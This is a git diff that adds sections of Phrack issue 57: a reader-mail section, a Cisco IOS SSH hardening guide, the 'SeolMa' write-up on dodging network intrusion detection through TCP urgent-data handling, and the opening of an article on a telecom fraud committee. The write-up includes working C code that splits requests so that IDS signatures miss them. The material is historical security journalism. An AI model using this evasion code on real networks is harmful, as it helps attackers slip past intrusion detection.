+int DirNameLength=strlen(DirectoryName);
+char DirToBeCreated[256];
+
+for(i=1;i<DirNameLength;i++) /* i starts at 1, because we never need to */
+   {                         /* create '/' */
+   if((DirectoryName[i]=='\\')||(DirectoryName[i]=='/')||
+      (i==DirNameLength-1))
+      {
+      strncpy(DirToBeCreated,DirectoryName,i+1);
+      DirToBeCreated[i+1]='\0';
+      CreateDirectory(DirToBeCreated,NULL);
+      }
+   }
+}
+<-->
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/2.txt b/phrack57/2.txt
new file mode 100644
index 0000000..a6c5962
--- /dev/null
+++ b/phrack57/2.txt
@@ -0,0 +1,351 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x02 of 0x12
+
+|=------------------------=[ L O O P B A C K ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ phrackstaff ]=----------------------------=|
+
+This month we present a loopback using some of the comments posted to the
+phrack.org web site.  Enjoy!
+
+
+|=[ 0x00 ]=--------------------------------------------------------------=|
+
+hey, i used to read phrack back in like 95 i thought it was dead but i
+checked and i cant believe there is a phrack 56, i take my hat off to you,
+hey i was just wondering when 57 might come out ?
+
+   [ Phrack57 is out NOW.... ]
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+From: "Terry Ferguson" <icebox@shocking.com> 
+To: <phrackstaff@phrack.org>  
+X-Mailer: Microsoft Outlook Express 4.72.3110.1
+Subject: [Phrackstaff] i am mekos
+
+i am mekos hi                                                                   
+when hack help plz.                                                             
+
+  [ UngaUnga BugaBuga.
+    Ups, we just disclosed the senders name, mailer and email address. ]
+
+|=[ 0x02 ]=---------------------------------------------------------------|
+
+
+I'm a french coder and i'm leading a project to          
+translate phrack articles in French. I'm writing to                             
+you for making this translation project something                              
+like an "official"  phrack translation project.
+
+Note : If you want to see translated article you can
+reach them at http://rtc.fr.st/proj/phrack.php or
+http://rtc.fr.st/proj/phrack/.
+
+Slash
+
+  
+  [ there is an italian maxim that says "traduttore, traditore" 
+    which means "translators are traitors" and the meaning
+    is lost after translation.
+    french people should learn english. ]
+
+|=[ 0x03 ]=--------------------------------------------------------------=|
+
+i want to recomendeted to pharck can you help me                                
+  
+  [ ??? ]
+
+|=[ 0x04 ]=--------------------------------------------------------------=|
+
+coma@irrelevant 2001-07-26
+Introduction phrack 56-1
+
+The old anarchy with turtles/astral projection/home drug lab Phrack
+articles make me want to rig some kind of testicle-electrocution apparatus
+-- perhaps through the parallel port. I could make a winamp plugin so that
+I get a painful shock to the balls every time the bass hits.
+
+     [ Obviously the twisted brain-wrong of a one-off man-mental. ]
+
+|=[ 0x05 ]=--------------------------------------------------------------=|
+
+tweeterbeeter@beehive.honeycomb.org 2001-08-01
+Phrack Loopback phrack 56-2
+
+I eat meat, I tickle your feet, I ask for slashdot news it's neet,
+but today i saw an fbi bird, it tried to eat my honey word.
+Red worm ran, into the can, of win doze boxes, then sent some spam,
+to see if they could pester the man, who tries to run our nationalized
+land.
+Read the posts, chase the ghosts, who penetrate our servers and hosts,
+and you will come to learn to be, a non-elite computer hacker like me.
+if you need help, send me mail, I will gladly flame your tail,
+only after youve been inseminated, will my info be disseminated.
+That is right, I make light, cuz i dont get none night to night,
+but if a girl will come and get me laid, I'll make more funny for all to
+read. :)
+
+    [ Someone phone MixMaster Mike and tell him his services are no longer
+      required! ]
+
+|=[ 0x06 ]=--------------------------------------------------------------=|
+
+Hey,                                                                            
+My name is Roei but I am known in the web as Cosmo-OOC. I am a moderate
+hacker, not a great one yet not a lamer or a trojan user.
+I have written numeros guides and articles concerning hacking and computers.
+Do you accept those from new users ?
+
+  [ http://www.phrack.org/howto ]
+
+|=[ 0x07 ]=--------------------------------------------------------------=|
+
+bargdiggler@hotmail.com 2001-07-31
+Mobile Telephone Communications phrack 5-9
+
+how can I get my cellular phone back on without paying for it
+
+or how or where can i get a phone,nokia or nextel with unlimited everything
+for dirt cheap or free
+
+    [  I'm not entirely sure how, but as a substitute try rigging up two cupz
+       with a tight bit of string in-between them.  ]
+
+|=[ 0x08 ]=--------------------------------------------------------------=|
+
+From: xxxxx007uk@another.com                      
+To: phrackstaff@phrack.org                      
+
+Could you please send me the address for the Samba team's FTP Server            
+                                                                              
+thankyou,                                   
+                                              
+  [ yes, they have a hotline. Just call (888) 282-0870 (tollfree @#$)
+    or surf on their homepage: http://3483937961/ ]
+
+|=[ 0x09 ]=--------------------------------------------------------------=|
+
+papaskin@papaskin.com 2001-07-27
+Project Loki: ICMP Tunneling phrack 49-6
+
+I can't believe how old this article is!! Here it is July of 2001 and I'm
+tracking this Loki down myself. I'm in Network IDS and very new to it, and
+being told that this Loki icmp packet I see hitting our primary dns server
+is "normal network traffic". Only problem is that on the
+outgoing side of the dns server, it's throwing port probes and packets like
+there's not tommorrow. I'm thinking this has been converted to use UDP
+packets and even port 53 to mask itself as actual usable traffic. I guess
+it's time for me to pull the packets down and open each one. I pray to
+find Loki active actually in the raw packet data so I can say "ha
+ha" to my sys admins.
+
+  [  You're *praying* to find Loki on your primary DNS server?  And here'z a
+     crazy thought:  maybe that "suspicious" DNS traffic is... DNS traffic. ] 
+
+|=[ 0x0a ]=--------------------------------------------------------------=|
+
+prepressnews@hotmail.com 2001-07-26
+Screwing Over Your Local McDonald's phrack 45-19
+
+This is funny as hell. Any ideas on how to get some of Charlie X's other
+old articles?
+
+    [ I hear they have the Internet on computers now.  You could try using
+      that. ]
+
+|=[ 0x0b ]=--------------------------------------------------------------=|
+
+aristides_15@lycos.com 2001-07-26
+The Legion of Doom & The Occult phrack 36-6
+
+Interesting...
+
+Is this some sort of joke? I'm mostly open minded, but this seems
+unreal.
+
+-/|ristides
+
+    [  Do you think we'd joke about something like that?  Actually, everything
+       you read in Phrack is 100% false, including this sentence. ]
+
+|=[ 0x0c ]=--------------------------------------------------------------=|
+
+baniasadi@37.com 2001-07-23
+Hacking Voice Mail Systems phrack 11-4
+
+rhgfdgf
+cjfd
+fd
+fgvjbf
+vmvc
+
+    [ How MANY times do I have to tell you?  Take OFF the ball-gag before you
+      email us, you crazy fucking fetishist. ]
+
+|=[ 0x0d ]=--------------------------------------------------------------=|
+
+antigovernment@louish.com 2001-07-11
+Phrack World News XXIII Part 2 phrack 23-12
+
+Man phrack magizines are old. They are fucking out dated, you need to find
+new dialups for banks and stuff. Stuff putting up your old usless files and
+make new ones.
+
+    [ Unfortunately, I broke the Phrack time-machine, otherwise I would
+      certainly go forward in time and bring back some articles from the
+      future which wouldn't be "out dated" when we publish them.  Dorq. ]
+
+|=[ 0x0e ]=--------------------------------------------------------------=|
+
+general_failure@operamail.com 2001-07-06
+Introduction to PBX's phrack 3-9
+
+Hey, was this really written in 1980's. Wow! I am reading it after 15
+years.
+
+General failure
+
+    [ Sorry to disappoint you, but just like the dinosaurs, Phrack is actually
+      an elaborate hoax - it's really only been around for about 15 minutes. ]
+
+|=[ 0x0f ]=--------------------------------------------------------------=|
+
+general_failure@operamail.com 2001-07-06
+A Brief introduction to CCS7 phrack 51-15
+
+pretty nice. but i would have preferred a more detailed one..
+
+general failure
+
+    [ Must.. resist.. temptation.. to.. ridicule.. your.. nick.. ]
+
+|=[ 0x10 ]=--------------------------------------------------------------=|
+
+n.damus@caramail.com 2001-06-26
+VisaNet Operations Part II phrack 46-16
+
+credit card number
+video sex
+
+    [ Iz that some sort of offer?  I regrettably decline. ]
+
+|=[ 0x11 ]=--------------------------------------------------------------=|
+
+eyberg@umr.edu 2001-06-22
+Phrack Loopback phrack 56-2
+
+greets-
+I want to congratulate you guys on kicking ass in the underground for
+all these years.
+
+    [  Thankz, but we're actually pretty new to thiz. ]
+
+As wise old eze (could have) said "motherfuck 2600,
+motherfuck slashdot, motherfuck linux and let the real motha'fuckn' hackers
+in!" eheh.. [wtf?] Anyway, I wanted you to know that your logic has
+probably helped out the underground a hell load then just making fun of the
+people (which you do and is very fucking funny).
+
+    [  I think you contradicted yourself there buddy. ]
+
+I only wish your issues
+would come out more often and every kid could read them as much as they
+read their gpl'd slashdot/2600 "i 0wn j00z everything" fuqn' shit
+articles. God, it'll be the day when the new generation of
+"hackers" actually hack and not sit around mimicking your
+tremendous journal (like b0g) or idle on irc all day and smurf anyone they
+don't recognize.
+
+    [  I think that day already arrived years ago. ]
+
+Once again keep up the good work and keep the scene
+alive.
+
+    [  Cheerz. ]
+
+-cyn0n
+
+|=[ 0x12 ]=--------------------------------------------------------------=|
+
+i love cox 2001-07-21
+Knight Line I Part 3 phrack 32-12
+
+fuck you !!!!!!putang ina niyo mga manchuchupa !!!!!!
+
+    [ So much anger for someone so young.  Oh, and I think you meant to say
+      "cock", not "cox". ]
+
+|=[ 0x13 ]=--------------------------------------------------------------=|
+
+cyhotrex@yahoo.com 2001-07-18
+Index phrack 6-1
+
+teach me more!
+ill apply it very well!!!
+
+    [ Sure thing.  I'm programming my 'ultimate war machine' (tm) to come and
+      teach you everything you need to know. ]
+
+|=[ 0x14 ]=--------------------------------------------------------------=|
+
+vdehart@hvc.rr.com 2001-07-10
+An Overview of Prepaid Calling Cards phrack 47-13
+
+now would the best way to get pin be to goto the stores and try to sneek a
+peek at the pins or can you call the company # and try to put in a PIN by
+guessing numbers
+whats the most effective method?
+
+    [  For you?  Any of the ones you mention will be fine...  ]
+
+|=[ 0x15 ]=--------------------------------------------------------------=|
+
+Tigerbyte@hotmail.com 2001-07-06
+Introduction to PAM phrack 56-13
+
+I am a novice. Is it necessary to read through all the Phrack philez or
+where should I start
+email a responce to TigerByte@hotmail.com.
+
+    [ Yes, it is absolutely necessary to begin reading Phrack at issue one,
+      article one, and continue up from there. ]
+
+|=[ 0x16 ]=--------------------------------------------------------------=|
+
+general_failure@operamail.com 2001-07-06
+A Brief introduction to CCS7 phrack 51-15
+
+pretty nice. but i would have preferred a more detailed one..
+
+general failure
+
+    [ Must.. resist.. temptation.. to.. ridicule.. your.. nick.. ]
+
+|=[ 0x17 ]=--------------------------------------------------------------=|
+
+pepelic@hotmail.com 2001-07-01
+The #hack FAQ (Part 1) phrack 47-5
+
+Hello,I am Srdjan and have one question...
+
+How do I crack car chip for security?That chip blocked car if are
+stealen.
+
+BEST REGARDS
+
+    [ Crack for security?  Don't get everyone started on that debate... ]
+
+|=[ 0x18 ]=--------------------------------------------------------------=|
+
+n.damus@caramail.com 2001-06-26
+VisaNet Operations Part II phrack 46-16
+
+credit card number
+video sex
+    
+    [ Iz that some sort of offer?  I regrettably decline. ]
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/3.txt b/phrack57/3.txt
new file mode 100644
index 0000000..7ee22d5
--- /dev/null
+++ b/phrack57/3.txt
@@ -0,0 +1,747 @@
+                            ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x03 of 0x12
+
+|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ phrackstaff ]=----------------------------=|
+
+
+
+|=[ 0x00 ]=--------------------------------------------------------------=|
+
+In Phrack Volume 0xa Issue 0x38, the Linenoise section noted "Phrack
+Linenoise is a hodge-podge" and that there was a "section in Linenoise
+specifically for corrections and additions to previous articles".
+
+So, we figured, what the fuck, let's publish an Addendum to the
+"Building Bastion Routers Using Cisco IOS" article in Phrack Issue
+55-10.
+
+When we first wrote the article, which was over 2 years ago, support
+for SSH in IOS was very new and only for the 7xxx and 12xxx series
+routers and only in the latest 12.0 release trains. We made a
+judgement call not to include it and indicated that it was imminent.
+Well, everybody sent us e-mail saying "hey, IOS has SSH now". Thanks,
+we know.
+
+With the release of 12.1(1)T, support for SSH is now available in most
+platforms. But, you might need to upgrade flash or DRAM in order to
+use it. According to the Cisco web site:
+
+    "Before configuring the SSH server feature, you must have an IPsec
+    encryption software image...."
+
+This basically means that you will probably need a minimum of 16MB of
+flash and probably about 32MB of DRAM. And make sure you download the
+3DES version so you don't get lulled into that false sense of security
+single-key DES offers.
+
+We should also note that IOS (and PIX for that matter) only support
+SSH protocol version 1, at a time when most of the security community
+is moving towards protocol version 2, now that free (e.g., OpenSSH)
+implementations are available with protocol 2 support. The word we've
+heard from Cisco is they have no plans for SSH protocol 2 support, and
+recommend that you use IPsec instead.
+
+One specific reason that Cisco should move towards protocol 2 support is
+that there are known weaknesses in protocol 1. In fact, these weaknesses
+have been known for more than a year and Cisco finally acknowledged that
+their implementation was also vulnerable. They released a security
+bulletin in June and the summary says it all:
+
+    "Three different Cisco product lines are susceptible to multiple
+    vulnerabilities in the Secure Shell (SSH) protocol. These issues are
+    inherent to the SSH protocol version 1.5, which is implemented in
+    several Cisco product lines."
+
+So now let's get down to business and show you how to configure
+it. The Cisco SSH implementation requires that the system have a
+hostname and domain name, so we'll start with that:
+
+1. Configure a hostname:
+
+   filter(config)#hostname filter
+
+2. Configure a domain name:
+
+   filter(config)#ip domain-name home.net
+
+3. Generate a host-specific RSA key. Use at least a 1024 bit key:
+
+   filter(config)#crypto key generate rsa 
+
+   The name for the keys will be: filter.home.net
+   Choose the size of the key modulus in the range of 360 to 2048 for your
+     General Purpose Keys. Choosing a key modulus greater than 512 may take
+     a few minutes.
+
+   How many bits in the modulus [512]: 1024
+   Generating RSA keys ...
+   [OK]
+
+Now, do the smart thing and make sure TELNET access is disabled and
+then save the configuration:
+
+   filter(config)#line vty 0 15
+   filter(config-line)#transport input none
+   filter(config-line)#transport input ssh
+   filter(config-line)#exit
+   filter(config)#exit
+   filter#write
+   Building configuration...
+   [OK]
+
+Also remember that you should put an access class on the VTY to have
+fine-grained control over which hosts can connect to the SSH server.
+
+4. You can now view the keys:
+
+   filter#sh crypto key mypubkey rsa
+   % Key pair was generated at: 14:41:28 PDT Jun 19 2000
+   Key name: filter.home.net           
+   Usage: General Purpose Key
+   Key Data:
+    30819F30 0D06092A 864886F7 0D010101 05000381 8D003081 89028181 00B3F24F
+    F51367B1 70460C52 B06E5110 F41A5458 EEE6A0DD 840EB3D3 44A958E9 E3BDF6BE
+    72AE2994 9751FFCB 127A5D20 318D945B FBC25FC5 D9E3BFED 8B9BBCA9 EC3A61B8
+    2BD6EC35 EA83CC56 27D08248 935A3F2A 9B941580 E69CC8B9 0C2CFA98 AD6F04CC
+    19BB8522 8E5907EA 6B047EF1 E5DBBE1C E2187761 2E106479 A4297932
+    19020301 0001  
+   % Key pair was generated at: 14:41:39 PDT Jun 19 2000
+   Key name: filter.home.net.server
+   Usage: Encryption Key 
+   Key Data:
+    307C300D 06092A86 4886F70D 01010105 00036B00 30680261 00CF13EE C84A2FE3
+    5720A5AB 5DA7B84D 2232E8E7 2589EF53 170BA42D 2830B2E0 44C2E60F 43BC06F2
+    9D52BC92 774B8442 99CD0F8F 7073F5C8 97C9A91B 14284981 D23808C0 EF71522E
+    CBBC87AB C1CCE95A 9813B13D D52BC0D0 DC4567A3 BA4C9F24 A1020301 0001
+
+The "General Purpose Key" is the host key and the "Encryption Key" is
+likely the ephemeral server key, which appears to be 768 bits.
+
+5. Configure the timeout and authentication retries if desired; the default
+   timeout is 120 seconds and the default number of authentication
+   retries is 3:
+
+   filter(config)#ip ssh time-out 60
+   filter(config)#ip ssh authentication-retries 2
+
+6. Configure Authentication:
+
+There are many different authentication schemes you can use including
+RADIUS and TACACS. We'll cover just two of the simpler schemes here:
+
+   Option 1: Use the enable password:
+
+   filter(config)#aaa new-model
+   filter(config)#aaa authentication login default enable
+
+   Option 2: Local passwords:
+
+   filter(config)#aaa authentication login default local 
+   filter(config)#username beldridg password 0 junos
+   filter(config)#service password-encryption
+
+7. Test it out:
+
+   [beldridg@anchor tmp]$ ssh 192.168.3.9
+   beldridg@192.168.3.9's password:
+   Warning: Remote host denied X11 forwarding.
+   Warning: Remote host denied authentication agent forwarding.
+
+   filter>sh ssh
+   Connection      Version Encryption      State                   Username
+    0              1.5     3DES            Session started         beldridg
+
+The warning messages are normal if your SSH client is configured to
+request X11 and authentication agent forwarding. The reason for the
+X11 forwarding message is that the system doesn't have any X clients,
+and thus no need for X11 forwarding.  It also doesn't support agent
+forwarding since the Cisco implementation doesn't support RSA
+authentication.
+
+Unfortunately, there is no mechanism to configure the SSH server to
+only accept the 3DES cipher. An enhancement request was filed with
+Cisco over 1 year ago and we have not heard back on the status of our
+request. This means that crippled SSH clients, or clients that request
+DES, can still connect to the server:
+
+   [variablek@anchor variablek]$ ssh -c des 192.168.3.9
+   Warning: use of DES is strongly discouraged due to cryptographic weaknesses
+   variablek@192.168.3.9's password: 
+   Warning: Remote host denied X11 forwarding.
+   Warning: Remote host denied authentication agent forwarding.
+
+   filter>sh ssh
+   Connection      Version Encryption      State                   Username
+    0              1.5     DES             Session started         variablek
+
+8. SSH Client 
+
+With the release of 12.1(3)T, IOS also has an SSH client (supports
+DES and 3DES) so you can initiate outbound connections with something
+like the following:
+
+   filter#ssh -l beldridg 10.0.0.1
+
+Newer IOS releases also provide the capability to copy configurations
+to and from SSH servers via scp although we haven't played with that yet.
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+Subject:  NIDS Evasion Method named "SeolMa"
+
+Recently, a new unique TCP property has known by some simple tests. This
+property was found when we put Urgent TCP data in the middle of normal
+TCP data stream, and it could be used as a way to avoid the pattern
+matching of most IDS, especially NIDS..
+
+Firstly, it is worth focusing on the discordance of the interpretation
+process between the way of the common Operating Systems and the definition
+of RFC 1122.  (We wouldn't cover the all of the TCP Urgent mode in this
+paper).
+The TCP/IP implementation, derived from the traditional BSD System,Urgent
+pointer in TCP header point to the data right after the last Urgent data.
+But RFC says the Urgent Pointer should point to the last Urgent data.
+
+Above two different Urgent Pointer interpretation process make two
+different result against below test.
+
+The testing was executed about Apache and IIS, as an application,
+on Solaris ( 7,8 )  , Linux 2.2.14, and Windows 2000.
+Undoubtedly, from my point of view, these two application hasn't any
+special definition for the communication of Urgent data.
+(i.e., these would be handled in the same way of general TCP data.)
+
+At first test, string packet "ABC" was sent in plain way, and then string
+packet "DEF" was forwarded in Urgent mode.
+Finally string packet "GHI" was delivered. Urgent Pointer value in "DEF"
+tcp packet was "3" .
+After sending these string, the final string composition on the host was
+not the expected "ABCDEFGHI",
+but the strange "ABCDEGHI", which was on the log of each application,
+to our surprise.
+The character "F" vanished.
+
+During this first test above, the environment of Linux follows BSD format
+for Urgent data processing.
+Therefore, the setting was changed as the way on RFC 1122 for the next
+test.
+These setting could be referred at TCP MAN page.
+ex) echo "1" > /proc/sys/net/ipv4/tcp_stdurg
+
+At second test, Linux's Urgent Pointer interpretation process follows
+RFC 1122.
+The same procedure was applied to the packet transmission at second test.
+Urgent Pointer value in "DEF" tcp packet was "3" also.
+At this time, the result was not "ABCDEFGHI", but "ABCDEFHI", to our
+another surprise.
+The Character "G" was missed at this test.
+
+>From the verification of the packet transmission using TCPDUMP and the
+results above, we reach to the conclusion as the following.:
+
+"1 Byte data, next to Urgent data, will be lost, when Urgent data and
+normal data are combined."
+
+Analyzing the first test, the value of Urgent Pointer was "3",
+when "DEF" was sent in Urgent mode.
+However, the actual Urgent Data count become "3 - 1 = 2", due to following
+the BSD format, and only  "DE" is regarded as Urgent data
+and 1 Byte data "F", after "DE", is lost.
+
+Similarly, the second test result could be explained.
+The Urgent Pointer value of "DEF" tcp packet was 3.
+In this case, the whole "DEF" become Urgent Data and following "GHI" is
+normal data.
+The character "G" is discarded, as 1 Byte data following Urgent Data,
+in the same way.
+
+It is significant that BSD processing is applied to all the default
+processings of the Operating Systems in these tests.
+
+Now, by using this feature, NIDS could be easily deceived because it has no
+consideration for this.
+Assume one would like to request "GET /test-cgi" URL.
+Then divide "test-cgi", which could be the signature of NIDS, into at least
+3 parts.
+
+Let's split into "tes", "t-c" and "gi".
+If "t-c" is sent as Urgent data, it is clear that the last 1 Byte "c" will 
+be
+lost and the last combination will be "test-gi".
+Thus one would add any 1 Byte at "t-c" for cheating.
+
+Forward like "tes", "t-cX" and "gi" with same manner.
+Then the final host's Apache or IIS will recognize as "test-cgi", but the
+result of the composition in NIDS will be "test-cXgi" without consideration
+of this. It is no wonder that one could avoid NIDS pattern matching through
+this.
+This is not managed even on Snort,  Open-Source.
+Commercial NIDS is also blind for this.
+
+For the worse, the OS like Linux 2.2.14 version shows different result by
+the speed of transmission, when Urgent data is sent more than three times.
+This would deteriorate the protecting way of NIDS.
+That is, just the prediction of 1 Byte loss wouldn't be solution.
+
+For Example, sending "ab" in normal, "cd" in Urgent mode, "ef" in normal,
+"gh" also in Urgent mode, "ij" in normal, and final "kl" in Urgent mode,
+would result in "abcefgijk" by the previous theory on this paper.
+However, actual outcome is "abcdefghijk" and the final Urgent data would
+follow the previous property.
+For the all Urgent data's compliance of previous property, each transmission
+of data needs sleep in betweens.
+
+For more details, following "seolma.c" source could be referred.
+
+The following source will show the simple concept of that.
+
+I gave "SeolMa" as a name of this method.
+
+
+Acknowledgement:  Thanks to other RealAttack Team(www.realattack.com)
+members
+                  Yoon , Young  ( yoon0258@www.a3sc.co.kr )
+                  Oh, Jae Yong  (syndcate@orgio.net )
+                  Yoon, Young Min (scipio21@yahoo.co.kr)
+
+|=[ SeolMa.c ]=----------------------------------------------------------=|
+
+/*  This is a simple source code for just test.
+    You can improve your exploit source by observing it
+    Compiled and Tested on Linux 2.2.X
+    It works aginst most Apache , IIS   well .
+    Improve your web-cgi scan, attack tool
+
+   Written by : YoungJun Ko,  ohojang@realattack.com  
+                Sungjun Ko, Minsook Ko
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <fcntl.h>
+
+#define TCP_PORT 80
+#define SOL_TCP 6
+#define TCP_NODELAY  1
+#define TARGET_IP "1.2.3.4"
+
+/* counter <  NIDS's Signature length - 1
+    For example,  Against "test-cgi "
+    should counter < 7   */
+
+int counter=0;
+
+/* writen() is  important point  in this source code...
+    I adjust Stevens's code */
+
+int writen(fd, ptr, nbytes ,sockfd,origin)
+register int fd;
+register char *ptr;
+register int nbytes;
+int sockfd;
+char *origin;
+{
+       int nleft, nwritten ;
+       int i, k;
+       char urgent[2];
+       int done =0;
+       int all =0;
+
+       nleft= nbytes;
+
+            while( nleft > 0 ) {
+              nwritten = write(fd , ptr, counter );
+              if ( nwritten  <= 0 )
+                   {
+                    printf("Write Error \n" );
+                    return (nwritten);
+                   }
+
+              nleft -=  nwritten ;
+              ptr += nwritten;
+
+       all += nwritten;
+
+  /* For some Linux, we must sleep . */
+     sleep(2);
+  /* 4 times insertion is enough for IDS evasion in simple cases */
+   if (  done != 4  )
+        {
+        for (k=1 ; k <=1 ; k++ )
+   {
+        urgent[0]= *ptr;
+        urgent[1]= 'X';
+        urgent[2]= '\0';
+        
+        i = send( fd, urgent , strlen(urgent), MSG_OOB ) ;
+        printf("send result is %d\n" , i );
+   }
+        done  +=1;
+         ptr += 1;
+          }
+
+  }
+           return(nbytes - nleft );
+}
+
+
+int
+main(int argc, char *argv[])
+{
+    int sockfd;
+    int i,j,k,sendbuff;
+    socklen_t optlen;
+    struct sockaddr_in serv_addr;
+    char buffer[2048];
+    char recvbuffer[2048];
+    bzero( (char *)&serv_addr , sizeof(serv_addr) );
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = inet_addr(TARGET_IP );
+    serv_addr.sin_port = htons ( TCP_PORT  );
+    counter = atoi(argv[2]);
+    if ( counter == 0 )
+    {
+       printf("You must input counter value \n" );
+       exit(-1) ;
+    }
+    if ( (sockfd = socket( AF_INET , SOCK_STREAM , 0 )) < 0 )
+    {
+	       printf("Error socket \n");
+	       exit(-1);
+    }
+
+    sendbuff = 1;
+    optlen = sizeof(sendbuff );
+
+    i= setsockopt( sockfd,
+                   SOL_TCP,
+                   TCP_NODELAY,
+                   (char *)&sendbuff,
+                   optlen);
+    printf("setsockopt TCP_NODELAY value %d\n" , i );
+    if ( connect (sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0)
+    {
+	  printf("Connect Failed \n");
+	  exit(-1);
+    }
+/* make a such file contains "GET /test-cgi  /HTTP 1.0\n\n"  */
+   i= open(argv[1], O_RDONLY );
+   j=read ( i, buffer , sizeof(buffer));
+   printf(" Read Buffer size is %d\n", j );
+
+   k= writen( sockfd , buffer, j, sockfd, buffer);
+   printf("I write on socket %d bytes \n", k );
+   sleep(1);
+/*
+ * I use just simple read() ... Usually it make error ,
+ * But don't care about it
+ * Just observe your web server log. ( access_log  , ...   )
+ */
+   k = read ( sockfd, recvbuffer , sizeof(recvbuffer) );
+   printf(" I Read on socket %d bytes\n", k );
+   printf("%s\n", recvbuffer );
+
+  return 0;
+}
+
+
+|=[ 0x02 ]=--------------------------------------------------------------=|
+
+The Telecommunications Fraud Prevention Committee (TFPC)
+written by nemesystm, member of the dhc.
+http://dhcorp.cjb.net : neme-dhc@hushmail.com
+
+
+[introduction]
+In this article I will talk about the TFPC and what this committee
+actually does. I will take an issue that was raised during a meeting of
+the TFPC, explain its contents and what is going to happen in the (near)
+future to clarify exactly what the TFPC's activities are.
+I have added some miscellaneous information like a contact address and
+other Anti fraud initiatives in case you want to write to the TFPC or if
+you want to look into other similar initiatives.
+While making this article I was amazed how little information people I
+contacted were willing to give. This was also the reason why I decided to
+write this article as I stumbled upon the TFPC some time ago and found
+little to no information about them.
+I hope this article will be of use to you.
+please e-mail neme-dhc@hushmail.com if you have questions.
+
+nemesystm
+
+
+[What the TFPC does.]
+According to the guidelines that can be found on the TFPC website(1), "The
+TFPC is an open industry committee under the Carrier Liaison Committee
+(CLC). The TFPC provides an open committee to encourage the discussion and
+resolution, on a voluntary basis, of industry-wide issues associated with
+telecommunications fraud, and facilitates the exchange of information
+concerning these topics."(2)
+This told me next to nothing; a little searching was in order. The
+following factors affecting telecom fraud are handled by the TFPC:(3)
+
+ SPI's - Service Provider Identification
+   An SPI is a 4 character code that can be used in SS7 to identify who
+   provides the service of a call.
+   If you would like a short description of SS7 or Switching System 7, go
+   to: www.cid.alcatel.com/doctypes/techprimer/keywords/ss7.jhtml
+
+ Number pooling
+   Number pooling refers to the blocks of ten thousand numbers and thousand
+   numbers that a provider draws from to provide customers with phone
+   numbers. An example of a ten thousand number block is 214-745-xxxx
+
+ Merging of the BVDB - Billing Validation DataBase
+   The BVDB's are used by RAO (Revenue Accounting Offices) of the carriers
+   to calculate how much a customer has to pay. Currently BVDB's are not
+   merged so some people try to stay ahead of them.
+
+ Expansion of the LIDB - Line Information DataBase
+   The LIDB sends a message to the BVDB's telling them about a call that 
+   is being made. Fraud happens for example when the LIDB cannot connect to
+   the proper BVDB to write the bill.
+
+ Additions to LSR - Local Service Requests
+   LSR requests basically occur when you make a local call in North
+   America. You do not pay for the call and therefore it is not recorded
+   in any way. The TFPC is working together with the OBF (Order and Billing
+   Forum) to find a industry wide solution to make it that those calls are
+   also recorded by the DVDB's for the RAO's.
+
+A second source(4) also added the following:
+
+  "While much of the TFPC's activities are shrouded in secrecy, it is
+  actively addressing third number billing, incoming international collect
+  to cellular, incoming payphone and PBX remote access fraud."
+
+I think that clears things up a little.
+
+
+[who is in the TFPC.]
+The TFPC membership consists of a group of carriers including Ameritech,
+AT&T, Bellsouth, Bell Canada, British Telecom, Sprint and Verizon.(5)
+A TFPC member must be an organization, company or government agency that 
+is affected by Telecommunications Fraud.
+Because the TFPC discusses sensitive information a non-disclosure agreement
+must be signed.(6) When becoming a member of the TFPC you also have to pay
+a membership fee. The membership fee is relatively small and really more 
+a sign of good will.(7)
+
+
+[what they decide - case study]
+In the infinite wisdom that the TFPC has, ;) they decided that it was
+alright to make one of the issues public. The issue I was able to get was
+Issue #0131(8), subtitled: "Identification of Service Providers for Circuit
+Switched Calls".
+The issue was raised by Norb Lucash of the USTA.
+
+  "Issue statement: In a multi-service provider environment (e.g. resale,
+  unbundling, interconnection) there is a need for a defined
+  architecture(s) to identify entities (companies) that are involved in
+  circuit-switched calls to facilitate billing and auditing."
+
+If you look into this you'll see that it means that there was no
+identification of the individual service providers when phone calls were
+circuit switched. Apparently Local Service Providers (LSP's) were
+identified by the originating phone number, but because of the current
+"environment" this is not working properly, so sometimes calls that cost
+money can not be properly billed.
+To solve this problem phone calls are to be accompanied by a SPI. Then
+everyone can just check the SPI to find out who to bill for the call.
+There are several solutions to the problem so a strawman was created called
+"Service Provider Identification Architectural Alternatives Report"(9).
+Quite the mouthful.
+This issue was first raised on 11/17/98 and is still being worked on. In
+general session #28 (one of the tri-yearly meetings) on May 1st of 2001 
+it was concluded that this was allowed to be made available on the NIIF site.
+The NIIF were the people that made the strawman. NIIF stands for Network
+Interconnection Interoperability Forum and is part of the CLC, just like
+the TFPC is.
+
+I believe this will be a recipe for disaster. What if a rather disgruntled
+individual manages to get the SPI of company X? This individual truly
+dislikes company X. So he hooks into a main phone line and calls the most
+expensive places and does it quite often. The company handling the phone
+calls recognizes the SPI to be from company X. Company X gets the bill and
+thinks: no problem, we'll just bill the person who made the calls. When
+company X finds out none of their clients made those calls they have lost
+money. The choice made from the solutions below will decide how the attack
+would be done.
+
+
+[the alternatives - case continued]
+As I said before, there are several solutions to the problem of the SPI's.
+Here they are:
+A. Switch-Based Alternative
+B. Non-Real Time Database Alternative
+C. Network Database Alternative
+D. Non-Call Setup Network Alternative
+E. Phased SPI Implementation Alternative
+What follows is a run through of how each solution would work.
+
+A. Switch-Based Alternative
+When a call is coming in, information about the account owner of the
+person calling becomes available as a line-based attribute. Both the
+acount owner and switch owner information is forwarded in a new parameter
+in the (SS7) call-setup signalling of the IAM (Initial Address Message).
+This information is then made available to every network node on the route
+of the call. When the calls reaches the final switch, similar information
+of the SPI of the called number is returned via (SS7) response messages,
